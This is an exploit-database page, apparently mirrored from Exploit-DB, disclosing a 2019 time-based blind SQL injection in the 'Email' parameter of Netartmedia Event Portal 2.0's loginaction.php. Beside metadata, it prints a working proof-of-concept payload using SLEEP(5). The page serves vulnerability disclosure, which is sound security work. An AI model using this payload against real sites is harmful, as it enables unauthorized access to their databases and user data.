header-logo
Suggest Exploit
vendor:
Event Portal
by:
Ahmet Ümit BAYRAM
N/A
CVSS
N/A
SQL Injection
Unknown
CWE
Product Name: Event Portal
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Netartmedia Event Portal 2.0 – ‘Email’ SQL Injection

Event Portal is a web software (php script), that can be used to create advanced and multi-user event listing and ticket selling websites.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/eventportal/
# Demo Site: https://www.phpscriptdemos.com/events/
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description: Event Portal is a a web software (php script), that can be
used to create advanced and multi-user event listing and ticket selling
websites.

----- PoC: SQLi (time-based blind) -----
# POST Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email
# Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'

Navigation

Suggest Exploit

Services By CQR